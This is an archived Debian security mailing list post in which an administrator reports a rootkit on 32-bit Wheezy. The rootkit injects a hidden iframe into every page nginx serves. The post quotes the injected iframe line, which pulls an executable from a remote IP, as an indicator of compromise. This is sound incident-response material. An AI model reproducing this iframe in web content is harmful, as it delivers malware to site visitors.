debian wheezy i386 nginx iframe rootkit

To: debian-security@lists.debian.org
Subject: debian wheezy i386 nginx iframe rootkit
From: E Frank Ball III <frankb@efball.com>
Date: Wed, 11 Sep 2013 15:48:20 -0700
Message-id: <[🔎] 20130911224820.GF30351@kamajii.efball.com>
Reply-to: frankb@efball.com

Last fall there was a debian 64-bit / nginx rootkit going around,
now I've been hit with what sounds similar but on 32-bit wheezy.

Here's a link to info on the previous 64-bit rootkit:
https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections


All files served by nginx have this line inserted at the top:

<iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>

Whatever it was isn't there anymore:
 Connecting to 122.226.137.123:1111... failed: Connection refused.

I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
difference.

No ismod line in /etc/rc.local

I haven't been able to find anything.  Googling doesn't show anything
similar for debian wheezy i386, only sqeeze 64-bit.

I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
the nginx-light from debian wheezy but it made no difference.

This machine was built on July 19th.  I've uninstalled nginx. I'll hold
off rebuilding for now, maybe somebody here has some ideas?

   E Frank Ball          frankb@efball.com

Reply to:

Follow-Ups:
- Re: debian wheezy i386 nginx iframe rootkit
  - From: Joel Rees <joel.rees@gmail.com>
- Re: debian wheezy i386 nginx iframe rootkit
  - From: Rick Moen <rick@linuxmafia.com>
- Re: debian wheezy i386 nginx iframe rootkit
  - From: Luis Mondesi <lemsx1@gmail.com>

Prev by Date: RE: [SECURITY] [DSA 2754-1] exactimage security update
Next by Date: Re: debian wheezy i386 nginx iframe rootkit
Previous by thread: RE: [SECURITY] [DSA 2754-1] exactimage security update
Next by thread: Re: debian wheezy i386 nginx iframe rootkit
Index(es):
- Date
- Thread